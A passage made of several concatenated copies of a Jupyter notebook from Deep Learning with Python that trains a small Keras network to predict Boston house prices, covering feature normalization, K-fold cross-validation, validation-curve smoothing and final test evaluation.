practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
_____no_output_____
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
_____no_output_____
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
###Code
import tensorflow
tensorflow.keras.__version__
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from tensorflow.keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from tensorflow.keras import models
from tensorflow.keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from tensorflow.keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mae']
all_mae_histories.append(mae_history)
history.history.keys()
###Output
_____no_output_____
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.axis([0,500,2,4.8])
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
We are still off by about \$2,550. Wrapping upHere's what you should take away from this example:* Regression is done using different loss functions from classification; Mean Squared Error (MSE) is a commonly used loss function for regression.* Similarly, evaluation metrics to be used for regression differ from those used for classification; naturally the concept of "accuracy" does not apply for regression. A common regression metric is Mean Absolute Error (MAE).* When features in the input data have values in different ranges, each feature should be scaled independently as a preprocessing step.* When there is little data available, using K-Fold validation is a great way to reliably evaluate a model.* When little training data is available, it is preferable to use a small network with very few hidden layers (typically only one or two), in order to avoid severe overfitting.This example concludes our series of three introductory practical examples. You are now able to handle common types of problems with vector data input:* Binary (2-class) classification.* Multi-class, single-label classification.* Scalar regression.In the next chapter, you will acquire a more formal understanding of some of the concepts you have encountered in these first examples, such as data preprocessing, model evaluation, and overfitting.
###Code
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
# # note that due to the error allow_pickle=False, we need to use the slight workaround with numpy
# # from keras.datasets import boston_housing
# # import numpy as np
# # save np.load
# np_load_old = np.load
# # modify the default parameters of np.load
# np.load = lambda *a,**k: np_load_old(*a, allow_pickle=True, **k)
# # call load_data with allow_pickle implicitly set to true
# (train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
# # restore np.load for future normal usage
# np.load = np_load_old
# However, we don't need the workaround if importing from tensorflow datasets...
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
# from keras import models
# from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
# import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
# import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE');
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE');
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
